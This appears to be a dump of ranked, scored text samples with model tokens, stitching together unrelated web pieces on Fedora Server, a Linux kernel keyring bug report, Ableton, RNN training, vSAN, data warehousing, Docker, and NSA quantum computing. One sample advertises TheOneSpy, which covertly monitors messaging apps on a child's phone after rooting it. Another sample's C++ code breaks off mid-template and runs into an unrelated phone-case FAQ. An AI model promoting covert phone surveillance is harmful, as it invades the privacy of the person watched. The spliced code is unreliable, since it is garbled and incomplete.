the security aspects of a network of computers. - -Cockpit - -Cockpit is a web based tool for managing and monitoring servers. It takes a lot of the pain out of administering several servers allowing you to do it from one, easy to use, central location. It takes a lot of the pain out of managing all your services, users, containers and pretty much anything your server might be doing. - -OpenLMI - -OpenLMI is a project aimed at creating a standardized API based on DMTF-CIM for managing your Linux systems. From the their site: - -The OpenLMI project provides a common infrastructure for the management of Linux systems. Capabilities include configuration, management and monitoring of hardware, operating systems, and system services. OpenLMI includes a set of services that can be accessed both locally and remotely, multiple language bindings, standard APIs, and standard scripting interfaces. - -Rolekit - -Rolekit is the tool used to enable the easy deployment of different server roles. It makes it a snap to deploy different kinds of servers, such as web, mail, domain controllers, etc. (referred to as “roles”). - -Conclusion - -Suffice it to say, Server offers a lot of new and great functionality. So come by for the test day and take some time to get familiar with it’s offerings and make it an awesome release! More information can be found on the wiki – and you can always drop by #fedora-server or #fedora-qa if you have any questions or want to get involved!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 41; Score = 4390912.0 -<|begin_of_text|>For almost three years, millions of servers and smaller devices running Linux have been vulnerable to attacks that allow an unprivileged app or user to gain nearly unfettered root access. Major Linux distributors are expected to fix the privilege escalation bug this week, but the difficulty of releasing updates for Android handsets and embedded devices means many people may remain susceptible for months or years. - -The flaw, which was introduced into the Linux kernel in version 3.8 released in early 2013, resides in the OS keyring. The facility allows apps to store encryption keys, authentication tokens, and other sensitive security data inside the kernel while remaining in a form that can't be accessed by other apps. According to a blog post published Tuesday, researchers from security firm Perception Point discovered and privately reported the bug to Linux kernel maintainers. To demonstrate the risk the bug posed, the researchers also developed a proof-of-concept exploit that replaces a keyring object stored in memory with code that's executed by the kernel. - -The vulnerability is notable because it's exploitable in a wide array of settings. On servers, people with local access can exploit it to achieve complete root access. On smartphones running Android versions KitKat and later, it can allow a malicious app to break out of the normal security sandbox to gain control of underlying OS functions. It can also be exploited on devices and appliances running embedded versions of Linux. While security mitigations such as supervisor mode access prevention and supervisor mode execution protection are available for many servers, and security enhanced Linux built into Android can make exploits harder, there are still ways to bypass those protections. - -Update, Jan. 20, 1:48 PST: In a post published a day after this post went live, Google said company researchers don't believe any Android devices are vulnerable to exploits by third-party applications. It also said researchers believe that the number of Android devices affected is "significantly smaller than initially reported." Google will nonetheless issue an update in March that patches the vulnerability. - -"As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets)," Perception Point researchers wrote. "While neither us nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible." - -While malware distributors have focused most of their resources over the years on infecting computers running Microsoft Windows, they have put increased focus on attacking competing OSes. In 2014, -================================================================================ -Rank = 42; Score = 4390912.0 -<|begin_of_text|>The Scream Remake Made The Weirdest Decision Possible By Nick Venable Random Article Blend Scream Scream!” - -The news comes from Ghost Face creator R.J. Tolbert, who spoke with - -Please note that I had been in communication with TWC regarding this and they have informed me that, as of now and during the initial launch, that Ghost Face is not involved in the new format. They also indicated that because of this direction, it does not mean, that Ghost Face will not be involved at a later date. So, there is still a question, to the question. However, as of now, there is no involvement.” - -You gotta love anyone who says there is still a question to a question. This is pretty surprising news, given I can’t possibly correlate any other image with the concept of Scream than the Ghost Face mask. (Nor the Scary Movie films.) Sure, I can picture Jaime Kennedy in turmoil, but I don’t want that to get showcased in the MTV series either. Tolbert wanted to make it clear to everyone that he feels the same way about the connection between the killers’ mask choice and the film series. - -We [Fun World] believe Scream is Ghost Face and Ghost Face is Scream. However, while Ghost Face is owned by Fun World, the Scream motion picture franchise is owned by The Weinstein Company, and it is their option to film a movie or TV show without Ghost Face.” - -The - -Sure, there’s still a chance that Ghost Face will make his presence known at another point in the series’ existence, but it has to actually last first. And what are the chances of that happening if they don’t even have the core franchise image to market it with? Every so often, a film sequel gets made despite having zilch to do with the original film. It occurs less often on TV, but that’s exactly what’s happening with MTV’s upcoming series, based on the highly lucrative film franchise of the same name. The show’s creative team will reportedly be leaving the Ghost Face mask out of it altogether, which basically means this series will be inspired by murdered teenagers. News about dead teens always makes me think, “That’s so!”The news comes from Ghost Face creator R.J. Tolbert, who spoke with GhostFace.co recently about the subject of the copyrighted character appearing in the series, and here’s what he had to say.You gotta love anyone who says there is still a question to a question. This is pretty surprising news, given I can’t -================================================================================ -Rank = 43; Score = 4390912.0 -<|begin_of_text|>MIDI to Audio with frozen tracks – No Flatten - -Have you ever wanted to turn your MIDI track to Audio but keep the MIDI? Well, I use this quick tip all the time. I discovered it by mistake when editing years back, and find myself doing it all the time. What you need to do is first Freeze your MIDI track. Once it is frozen you can select the MIDI Clip and drag it into an Audio Track by holding Ctrl or CMD while you move it. This will create a copy of the “frozen” audio in the Audio Track, but the MIDI will still be there. You can then Unfreeze the MIDI track. - -Copy and Paste Time - -When you are writing a track there are times that you want to copy a whole section of the music or move the Verse after the Chorus, or you name it. This can be really tedious without knowing this workflow hack. The key is the Cut Time, Paste Time, and Duplicate Time option in Ableton Live. - -All you need to do is select an area in Arrangement View. This will be the area that will be duplicated or cut. Then navigate up to the Edit –> Duplicate Time. This will duplicate everything during that time period of the track. I will usually then pick, Edit –> Cut Time, select where I want this section to go and then, Edit –> Paste Time. This way I can duplicate the whole verse or chorus and place it later on in the track as I am building the composition. - -Drag in Older Versions - -Let’s say you are working on a track. You save multiple versions as you go, this is just a damn good idea. You had a baseline and started to rewrite it. After a while, you realize that you liked the old baseline, but have done a lot of other things along the way. You can actually drag a track from one of the older versions. This makes it easy to revert back to a past part. - -To do this I usually navigate to the Current Project in my Browser. This shows all other versions you have saved if it is in the same project folder. If not, or you want to bring in another track from another song you can just navigate there with your browser. Next up you click the triangle next to the Live Set to open it up. You will then see all the tracks in the Live Set. Click the track you want and drag it into Live. - -This lets you easily revert to older versions and save a lot of time. - -Copy Value to Sibling - -When you are tweaking -================================================================================ -Rank = 44; Score = 4292608.0 -<|begin_of_text|>Some practical tricks for training recurrent neural networks: - -Optimization Setup - -Adaptive learning rate. We usually use adaptive optimizers such as Adam (Kingma14) because they can better handle the complex training dynamics of recurrent networks that plain gradient descent. - -We usually use adaptive optimizers such as Adam (Kingma14) because they can better handle the complex training dynamics of recurrent networks that plain gradient descent. Gradient clipping. Print or plot the gradient norm to see its usual range, then scale down gradients that exceeds this range. This prevents spikes in the gradients to mess up the parameters during training. - -Print or plot the gradient norm to see its usual range, then scale down gradients that exceeds this range. This prevents spikes in the gradients to mess up the parameters during training. Normalizing the loss. To get losses of similar magnitude across datasets, you can sum the loss terms along the sequence and divide them by the maximum sequence length. This makes it easier to reuse hyper parameters between experiments. The loss should be averaged across the batch. - -To get losses of similar magnitude across datasets, you can sum the loss terms along the sequence and divide them by the maximum sequence length. This makes it easier to reuse hyper parameters between experiments. The loss should be averaged across the batch. Truncated backpropagation. Recurrent networks can have a hard time learning long sequences because of vanishing and noisy gradients. Train on overlapping chunks of about 200 steps instead. You can also gradually increase the chunk length during training. Preserve the hidden state between chunk boundaries. - -Recurrent networks can have a hard time learning long sequences because of vanishing and noisy gradients. Train on overlapping chunks of about 200 steps instead. You can also gradually increase the chunk length during training. Preserve the hidden state between chunk boundaries. Long training time. Especially in language modeling, small improvements in loss can make a big difference in the perceived quality of the model. Stop training when the training loss does not improve for multiple epochs or the evaluation loss starts increasing. - -Especially in language modeling, small improvements in loss can make a big difference in the perceived quality of the model. Stop training when the training loss does not improve for multiple epochs or the evaluation loss starts increasing. Multi-step loss. When training generative sequence models, there is a trade-off between 1-step losses (teacher forcing) and training longer imagined sequences towards matching the target (Chiappa17). Professor forcing (Goyal17) combines the two but is more involved. - -Network Structure - -Gated Recurrent Unit. GRU (Cho14 -================================================================================ -Rank = 45; Score = 4292608.0 -<|begin_of_text|>Almost four years ago, I documented a really cool vSAN capability here and here, which demonstrates how to bootstrap a vSAN datastore onto a single ESXi host. This powerful capability, which was by design, enables customers to easily standup new infrastructure including the vCenter Server Appliance (VCSA) in a pure greenfield environment where you only had bare-metal hardware to start with and no existing vCenter Server. - -As you can probably guess, I am a huge advocate for this capability and I think it enables some really interesting use cases for being able to quickly and easily stand up a complete vSphere environment without having to rely on an external storage array or playing games with Storage vMotion'ing the VCSA between local VMFS and the vSAN datastore for initial provisioning. - -Over time, this vSAN capability has gone mainstream not only from a customer standpoint but also internal to VMware. In fact, the use of this feature has made its way into several VMware implementations including but not limited to VMware Validated Designs (VVD), VxRail, VMware Cloud Foundation (VCF) and even in the upcoming VMware Cloud on AWS. This really goes to show how useful and critical of a feature this has become for standing up brand new VMware infrastructure which runs on top of vSAN. Huge thanks goes out to the original vSAN Architects who had envisioned such use cases and designed vSAN to include this functionality natively within the product and not have to rely or depend on vCenter Server. - -So what has changed in the with the new release of vSAN 6.6 (vSphere 6.5d) For starters, this functionality continues to exists, but the Engineers and specifically I would like to call out Christian Dickmann who was the lead architect for what I am about to talk about reached out to me and asked, could we make this even better? For those of you who have walked through the vSAN bootstrap process, although pretty straight forward it still does require quite a few steps to accomplish. Even with Automation, the overall user experience could still be improved and today, this bootstrap process is only available using the CLI or calling into several different remote APIs. - -In vSAN 6.6, the vSAN bootstrap process is now natively integrated into the VCSA UI Installer which is referred to as the vSAN Easy Install feature. This means, as part of selecting an ESXi host to deploy the VCSA (for a pure greenfield deployment), you will now also be able to configure the vSAN -================================================================================ -Rank = 46; Score = 4259840.0 -<|begin_of_text|>The world is changing. - -No – the world as we knew it in IT has changed. - -Big Data & Agile are hot topics. - -But companies still need to collect, report, and analyze their data. Usually this requires some form of data warehousing or business intelligence system. So how do we do that in the modern IT landscape in a way that allows us to be agile and either deal directly or indirectly with unstructured and semi structured data? - -First off, we need to change our evil ways – we can no longer afford to take years to deliver data to the business. We cannot spend months doing detailed analysis to develop use cases and detailed specification documents. Then spend months building enterprise-scale data models only to deploy them and find out the source systems changed and the models have no place to hold the now-relevant data critical to business success. - -We have to be more agile than that. - -We need a way to do Agile Data Engineering if we ever expect to achieve the goal of Agile Data Warehousing. - -The Data Vault System of Business Intelligence provides (among other things) a method and approach to modeling your enterprise data warehouse (EDW) that is agile, flexible, and scalable. This is the first in a series of posts introducing you to the Data Vault, what it is, and how to build one. - -Why Data Vault? - -Current approaches to modeling a data warehouse include developing 3rd Normal Form (3NF) type models or dimensional star schema models. Now, while there are indeed architects and modelers out there who have been wildly successful using these approaches, there are many more that have failed, and failed big. - -Why? Mostly lack of experience, but more so that these approaches have some basic issues that, while resolvable, do require a certain level of engineering expertise that is not readily available in the industry today (and is declining daily). - -What are these issues? - -In order to collect history in the usual 3NF approach you need to add a timestamp or snapshot date to every table in your model. Not only that but it needs to be in the primary key of the table so that you do not load duplicate rows on any given day. This of course complicates all the cascading foreign key (FK) relationships. In Figure 1 you can see a simple example of a standard Product and Product Category table with Snapshot Dates added to the keys. - -Figure 1. Basic model with Snapshot Dates added - -Even with this simple model you can start to see the issues. Adding a snapshot date to every PK makes all the keys more complicated. -================================================================================ -Rank = 47; Score = 4259840.0 -<|begin_of_text|>The growing world of smartphones and the use of instant messengers are playing a bigger role in daily life than ever before, these IM apps are connecting people with each other conveniently and freely in the digital world. Moreover, the use of instant messengers and the user’s adoption of Android devices on a larger scale is creating fear in the minds of the parents. So, the rain of instant messengers, mostly youngsters are involved in the usage of different kinds of instant messengers on the same Android device. Having said that, parents are fearful because of plenty of IM apps on their young kid’s mobile devices; it makes it difficult for parents to monitor multiple instant messengers on a particular Android device. There are a number of instant messengers but the most popular are Facebook Messenger, WhatsApp, Viber, Snapchat, Kik, Line, IMO, and Skype. Monitoring of a particular messenger is not really difficult but spying on multiple instant messengers on Android devices seems to be a problem. It’s because the best instant messenger’s apps work using similar methodology and the actual difference is the user interfaces and having some extra functions of every app. TheOneSpy (TOS) will let you monitor multiple IM apps on Android devices, you will be able to spy on up to 16 instant messaging application with the help of TOS monitoring app. All the instant messaging apps have very secure services; therefore to spy on multiple messengers, we have to apply some tactics to monitor multiple IMs. - -How is that possible? - -In order to monitor more than one instant messenger, we need rooting of our Android devices. Now the question is, how do we root the devices; It’s actually simple, we can use a software which can easily root almost any device. It’s called “KingoRoute” and is a free application. So, use this application and after the completion of the rooting of your device, you will enable to monitor multiple instant messengers with the help of TOS monitoring application. - -Why is the TheOneSpy the best option for spying multiple Messengers in Android devices? - -It’s because the TheOneSpy enables you to monitor multiple instant messaging applications at once, having single control panel you can monitor all of the conversation happening on multiple messengers on the single platform with complete and accurate time statistics. TOS is compatible with Android 4.0 up to Android 7.0 Nougat. TOS is reasonably priced, starting from $0.6/day. You might be able to find some discounts if you google it. Following -================================================================================ -Rank = 48; Score = 4227072.0 -<|begin_of_text|>Without affecting the original signal, we removed all of the outliers, yet introduce new ones. That is the shortcoming of the method, since change is a lot in a small interval(around peaks), this method introduces medians even if there is no outliers. The unwanted signal is closer to original signal, so there is still improvement. Further, this is easy to prevent with another heuristics. We will only look at the signal that behaves regularly or using a sliding window to have a more robust approach. But this example is important to show how a non-linear filter is able to reject all of the outliers without doing anything very complicated. This has due to mainly two reasons. First one is that $l_1$ norm. Instead of using $l_2$, we use $l_1$ as this norm does not change too much when an outlier gets introduced to the signal whereas $l_2$ norm(since it takes the square of the distance) outliers have much more profound effect. We are preventing using $l_1$ norm. Second one is that we are filtering adaptively. Instead of using a mean filter, and average all of the numbers, we only look at the candidates that could be outliers. First, we get convinced those points are outlier, then we attempt to remove them. This makes it hard to reject the regular signal. What about disadvantages? First and foremost, it is nonlinear filtering. There is no going back. You cannot get the original signal that you begin with. Further, we are also applying a threshold which makes it even harder. There are two important parameters, threshold and sliding window which requires some parameter tuning. But generally outliers are quite either signal specific or application specific. Therefore, this may not be a disadvantage.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 49; Score = 4227072.0 -<|begin_of_text|>It’s no secret that the installations at Burning Man are highly innovative and creative. The festival in Black Rock, Nevada, which is happening right now, promises to offer an escape from the regular constraints of society. This year, the festival is bigger than ever, featuring high-profile producers like Skrillex and Diplo and an all-new live stream to capture moments of the event. One creative group is taking it one step further by converting an airplane into a nightclub. - -The Big Imagination Foundation spent several months turning this Boeing 747 into what has been described as the “largest moving art experience ever made”. The project will stand on the Playa close to other art installations. The inside of the airplane will feature music and art. It will also travel around Black Rock City, pulled by an aircraft tug car. - -Inside the airplane, the experience begins once the participants answer the question “What baggage do you need to lose?”. An “Emotional Baggage Tag” is then created along with the boarding pass and passengers are later asked “Where are you going?” The answers to this question are displayed on the walls inside the airplane. The immersive installation is sure to be a psychological and liberating experience for attendants. - -For those of us that are wishing we were there, the Big Imagination Foundation is looking to develop a virtual reality experience for all. They are currently crowd-funding through their IndieGogo campaign. - -H/T: The Creator\’s Project<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 50; Score = 4227072.0 -<|begin_of_text|>In graph like data structures (explicit or implicit) there is a problem of memory safety when you remove a node. You have to clean up all the connections pointing to you. If your graph structure is explicit this is easy, otherwise it can often be annoying to find all pointers pointing to you. A while ago I thought that you could solve that by introducing a two way pointer, which has to be the same size as a normal pointer, but which knows how to disconnect itself on the other side, so that you don’t have to write any clean up code. - -The reason why it turned out surprisingly useful is that if both ends of the connection know about each other, I can make them keep the connection alive even if one of them is moved around. So if one of them lives in a std::vector and the vector reallocates, the TwoWayPointer can handle that case and just change the pointer on the other end to point to the new location. That can dramatically simplify code. - -One example is that I’m now using it in my signal/slot class which I’ve also included in this blog post. It allowed me to simplify the signal/slot implementation a lot. Compare it to your favourite signal implementation if you want. There is usually a lot of code overhead associated with memory safety. That all went away in this implementation. - -Here is the code for the two way pointer: - -#pragma once #include #include template struct TwoWayPointer { private: TwoWayPointer * ptr; template friend struct TwoWayPointer; template friend bool operator==(const TwoWayPointer &, const TwoWayPointer &); template friend bool operator!=(const TwoWayPointer &, const TwoWayPointer &); template friend bool operator==(const TwoWayPointer &, std::nullptr_t); template friend bool operator!=(const TwoWayPointer &, std::nullptr_t); template friend bool operator==(std::nullptr_t, const TwoWayPointer &); template friend bool operator!=(std::nullptr_t, const TwoWayPointerFAQ - -Is CLIC Marble made from real marble? - -Yes. Our CLIC Marble is made from the highest-quality white marble or black marble. The case features a very thin slice of marble to ensure it is lightweight and doesn’t add bulk to your iPhone. - -How much does CLIC Marble weigh? - -CLIC Marble for iPhone 6/6s weighs 31 grams (1.1 ounces) — in comparison, CLIC Wooden for iPhone 6/6s weighs 23 grams (0.8 ounces), and an iPhone 6 weighs 136.5 grams (4.8 ounces). CLIC Marble for iPhone 7 and 8 weighs 37 grams (1.3 ounces) — in comparison, CLIC Wooden for iPhone 7 and 8 weighs 28 grams (1 ounce), and an iPhone 7 weighs 138 grams (4.7 ounces). CLIC Marble for iPhone 7 Plus and 8 plus weighs 49 grams (1.7 ounces) — in comparison, CLIC Wooden for iPhone 7 Plus and 8 Plus weighs 35 grams (1.2 ounces), and an iPhone 7 Plus weighs 188 grams (6.6 ounces). - -What can I expect from the finish? - -Marble is a natural stone formed over thousands of years. Each slice has unique and intricate veins, so the finish will vary from case to case. - -Is the CLIC Marble shatter resistant? - -Yes. We deliberately used a very thin slice of marble laminated to a layer of fiberglass, giving the marble a degree of flexibility. This makes it easier to take on and off your iPhone and resistant to shattering. - -How do I care for my marble? - -Although a solid natural stone, marble is in comparison to other stones quite soft and porous. As such, care should be taken to keep your marble looking its best. To clean your marble, use warm water, a soft cloth, and a mild soap such as washing-up liquid. Never use anything acidic or abrasive to clean your marble, including natural solutions vinegar or lemon, which will dull the surface of the marble. Apply marble polish, available from hardware stores, on a regular basis to maintain the stone’s luster. - -Is the packaging recyclable? - -We’re proud to say that all our packaging is 100% recyclable, so you can enjoy our great products without hurting the planet.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 52; Score = 4194304.0 -<|begin_of_text|>InfluxDB : InfluxDB is an open-source time series database written in Go that has been built to work best with metrics, events, and analytics. Using InfluxDB, you can easily store system and application performance data and manage any time series data. - -Grafana : Grafana is an open-source, general purpose dashboard that is used for visualizing time series data for Internet infrastructure and application analytics. Grafana supports graphite, influxdb or opentsdb as backends and runs as a web application. - -In this tutorial, we will learn how to create and run Grafana and InfluxDB Docker containers in Ubuntu 14.04. - -Requirements - -A server running Ubuntu-14.04 with Docker installed. - -A non-root user with sudo privileges setup on server. - -Creating The Dockerfile - -First, you will need to create the Docker file to install all requisite software. Create docker file inside your home directory using the following command: - -sudo nano Dockerfile - -Add the following lines with all requisite software: - -FROM ubuntu MAINTAINER Hitesh Jethva (hitjethva@gmail.com) RUN apt-get update && apt-get -y --no-install-recommends install ca-certificates software-properties-common python-django-tagging python-simplejson python-memcache python-ldap python-cairo python-pysqlite2 python-support python-pip gunicorn supervisor nginx-light nodejs git curl openjdk-7-jre build-essential python-dev - -Add the following lines to install Grafana, InfluxDB, and do some basic configuration: - -WORKDIR /opt RUN curl -s -o /opt/grafana-1.8.1.tar.gz http://grafanarel.s3.amazonaws.com/grafana-1.8.1.tar.gz && curl -s -o /opt/influxdb_latest_amd64.deb http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb && mkdir /opt/grafana && tar -xzvf grafana-1.8.1.tar.gz --directory /opt/grafana --strip-components=1 && dpkg -i influxdb_latest_amd64.deb && echo "influxdb soft nofile unlimited" >> /etc/security/limits.conf && echo "influxdb hard nofile unlimited" >> /etc/security/limits.conf - -Next, copy some configuration files: - -ADD config.js /opt/grafana/config.js ADD nginx.conf /etc/nginx/nginx.conf ADD supervisord.conf /etc/supervisor/conf.d/superv -================================================================================ -Rank = 53; Score = 4177920.0 -<|begin_of_text|>In everyday life, I'm a web developer. Or, to be precise, I run a business that develops websites for a wide range of clients, from small businesses to large organizations. Every one of these sites comes with a CMS of some sort. Which CMS we use to develop the sites depends on a lot of factors, including what the client wants, the size of the website, and the required functionality. In this article, I'll cover the lessons learned when we developed our open source Bolt content management system. - -Keep the customer in mind - -Often when working on larger site, you'll work with a small group of people with different job descriptions and skill sets. This overlap between people with different areas of expertise can cause some problems when interests collide: - -An editor doesn't want to know about database structures. They don't care if something is XML, JSON, or Mediumtext. - -The backend developer shouldn't concern themselves with the exact markup that's used on the website. or , that's pretty much the same, right? - -Front end developers shouldn't need to know about scheduling new articles or whether or not the editor-in-chief has approved a change to an older article. - -I strongly believe that there's no single CMS that's well suited to run all websites, and I'm always surprised that there are a lot of web development agencies that use the same CMS for every single project they do. If I were a client of an agency like that, I'd wonder if the CMS I'm getting is really the best fit for my website, or if it just happens to be the CMS they use for all their clients. - -Because this is not how we would like to work, we've been looking around for CMSs that fit our workflow and, at the same time, complement each other. This way we have a few options to better help our clients without falling back to the same system every time. For most of the larger projects we develop, we use Drupal. It's a great system with a lot of functionality. Because of this, it's also a rather complex system (Especially for the editors, who eventually have to work in the system on a daily basis). We've done a lot of research to find a system that complements this: A simpler, more lightweight system for sites that don't require the extensive functionality offered by Drupal. - -Every system that we've evaluated when looking for this had one or more major downsides. It seems like every single CMS out there is written by a certain kind of person for a certain -================================================================================ -Rank = 54; Score = 4161536.0 -<|begin_of_text|>That's not all the article says. But since you failed to completely read my own first paragraph, I'm not surprised you didn't get through the article. I'll let you go re-read it. Also, all I'm seeing is still promising. You've yet to present any evidence whatsoever of them being harmful. - -Their use in this way has been studied somewhat (again..check the article), but obviously we don't yet know long-term effects for this particular use. But as you quoted, they have been safely used as a pause button in other contexts. There's no reason to think this wouldn't be safe. - -We have no reason to believe that medically halting puberty would affect someone mentally. Again, if people who naturally hit puberty late mature mentally the same, why should medical intervention be any different? All they're affecting is the hormones that spur the development of secondary sex characteristics. Your concerns are based in nothing but your own bias. - -It is very easy to change your mind based on all we know about different circumstances. You know, the ones where they've been used safely? Here's a crazy thing you keep forgetting. It's the child's choice. Puberty occurring naturally is something terrifying for transgender kids. It's a train they can't stop. Until puberty blockers. If a kid is getting uncomfortable with their body not developing they can be taken off the blockers. It's an easy fix. I'll refer you to the logic problem from earlier. The same train of thought here applies to why something that is easy to reverse is a better course than something that is hard to reverse. But since you're a broken record, I know you're just going to say "we don't know they're easy to reverse," but yeah. We do. Which is how they've been, again, used safely in other contexts. - -These kids might be helped in other ways. Or we could help them in a way we know works. Where the only safety concerns about them come from people who are against transgender people in the first place (I tried to resist going through your comment history, but it's not hard to spot an r/Gender_Critical user. Also great to see you're the same asshole who posted that whorephobic pole dancing article). - -Your whole last paragraph is just repetition of the same unfounded fears your entire argument is based on. Maybe take a step back and realize while there's actually evidence for the safety of puberty blockers, your entire opinion is based on fear and hate. Why don't you take a second -================================================================================ -Rank = 55; Score = 4128768.0 -<|begin_of_text|>Image caption The NSA wants to use its quantum computer to break encryption used to protect online communication - -The US National Security Agency is building a quantum computer to break the encryption that keeps messages secure, reports the Washington Post. - -The NSA project came to light in documents passed to the newspaper by whistle-blower Edward Snowden. - -The spying agency hopes to harness the special qualities of quantum computers to speed up its code-cracking efforts. - -The NSA is believed to have spent about $80m (£49m) on the project but it has yet to produce a working machine. - -If the NSA managed to develop a working quantum computer it would be put to work breaking encryption systems used online and by foreign governments to keep official messages secure, suggest the documents excerpted in the Post. - -The quantum computer is being developed under a research programme called Penetrating Hard Targets and is believed to be conducted out of a lab in Maryland. - -Processing power - -Many research groups around the world are pursuing the goal of creating a working quantum computer but those developed so far have not been able to run the algorithms required to break contemporary encryption systems. - -Current computers attempt to crack encryption via many different means but they are limited to generating possible keys to unscramble data one at a time. Using big computers can speed this up but the huge numbers used as keys to lock away data limits the usefulness of 